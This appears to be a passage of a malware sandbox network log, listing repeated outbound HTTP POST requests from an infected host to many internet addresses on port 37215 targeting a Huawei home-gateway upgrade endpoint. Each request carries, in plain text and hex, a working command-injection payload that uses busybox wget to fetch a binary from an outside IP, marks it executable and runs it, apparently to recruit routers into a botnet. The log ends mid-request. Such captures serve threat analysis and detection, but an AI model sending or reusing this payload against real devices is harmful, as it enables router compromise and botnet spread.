                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1258192.168.2.1534022138.7.112.17437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397209883 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1259192.168.2.1544254222.150.182.18537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397211075 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1260192.168.2.154761231.198.234.24837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397216082 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1261192.168.2.1538386190.193.150.14337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397217035 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1262192.168.2.1545734186.70.94.21437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397217035 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1263192.168.2.1540040102.146.110.19137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397263050 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1264192.168.2.154620037.185.80.5437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397285938 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1265192.168.2.153932241.234.37.2137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397285938 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1266192.168.2.155392494.76.145.16437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397305012 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1267192.168.2.1549800138.30.244.16437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397322893 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1268192.168.2.1539072222.87.86.13237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397360086 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
